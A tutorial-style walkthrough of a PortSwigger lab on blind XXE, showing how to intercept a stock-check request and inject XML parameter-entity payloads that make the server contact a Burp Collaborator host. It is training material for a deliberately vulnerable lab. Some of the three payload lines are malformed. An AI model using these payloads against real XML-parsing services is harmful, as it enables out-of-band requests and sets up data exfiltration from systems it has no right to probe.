Hello guys, today in Blind XXE with out-of-band interaction via XML parameter entities we will solve the 4th lab of PortSwigger Web Security. As you know, we are exploring XML or XXE vulnerabilities in a series and solving their practical labs.
In today’s article, we will solve the lab named “Blind XXE with out-of-band interaction via XML parameter entities” in a step-by-step manner.
Lab Description Of Blind XXE with out-of-band interaction via XML parameter entities
In this lab, there is a “check stock” feature that accepts input through XML parsing. The problem here is that it does not display any unexpected values and blocks the request if it contains regular external entities. To solve this lab, we need to create an XML parser through a parameter entity, make a DNS lookup request, and check the result in Burp Suite Collaborator.
First, access the lab. After accessing the lab, view any product. Once you view the product, you will find a stock check button there. Click on the stock check button and intercept it in Burp Suite.
<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"%xxe;> ]>
Now, take the given external entity definition and insert it between the XML declaration and the stockCheck element, and forward the request.
<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> %xxe;
<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN">
I have used 3 payloads above, out of which one will definitely execute.
Now, we need to check Burp Collaborator to see if any DNS and HTTP requests have been received there or not.
As you can see, we have received requests in Burp Collaborator. Now, let’s check if our lab has been successfully solved or not.
We have successfully solved the lab on Blind XXE with out-of-band interaction via XML parameter entities.
To continue studying check out the next lab i.e. Exploiting Blind XXE To Exfiltrate Data Using A Malicious External DTD, cover the current lab before visiting the next lab. Good Luck!
Website security refers to protecting a website or web application from cyberattacks, unauthorized access, or other security threats.
Web application security means protecting a website from cyberattacks. These attacks may include vulnerabilities such as SQL injection, XSS, file inclusion, and others.
It is always a good practice to use an up-to-date browser with timely updates. Keep your browser plugins up-to-date, avoid malicious websites and links, and always enable 2-factor authentication while avoiding clickjacking.
Searching for someone’s social security number or credit card information on the dark web is illegal and unethical. It is important to always avoid such activities and protect yourself and others from cyber threats.